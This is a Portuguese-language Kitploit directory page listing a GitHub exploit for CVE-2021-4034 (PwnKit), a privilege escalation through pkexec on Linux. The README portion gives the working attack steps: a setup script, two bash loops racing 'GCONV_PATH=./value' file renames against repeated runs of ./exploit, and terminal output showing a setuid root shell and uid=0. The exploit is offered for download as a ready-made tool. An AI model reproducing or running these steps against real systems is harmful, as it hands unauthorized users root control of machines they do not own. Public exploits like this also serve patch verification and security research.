Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/ayrx/cve-2021-4034
Escalada de PrivilégiosFrameworks de ExploraçãoExploraçãoDesenvolvimento de PayloadsExploração de Binários
GitHubayrx/cve-2021-4034

CVE-2021-4034

Exploit para CVE-2021-4034 (PwnKit) que aproveita uma condição de corrida no pkexec para elevar privilégios para root em sistemas Linux.

Ver Repositório
91148há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-4034

Exploit para a vulnerabilidade pwnkit da equipe da Qualys.

Este exploit assume que gcc está presente na máquina alvo.

root@kitploit:~
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

Execute o seguinte comando em uma sessão bash:

root@kitploit:~
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

Execute o seguinte comando em outra sessão bash:

root@kitploit:~
while :; do ./exploit; done

Você eventualmente vencerá a corrida e obterá um binário shell que lhe dá acesso root:

root@kitploit:~
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)

Um breve artigo sobre a técnica pode ser encontrado no meu blog.

Baixar ferramenta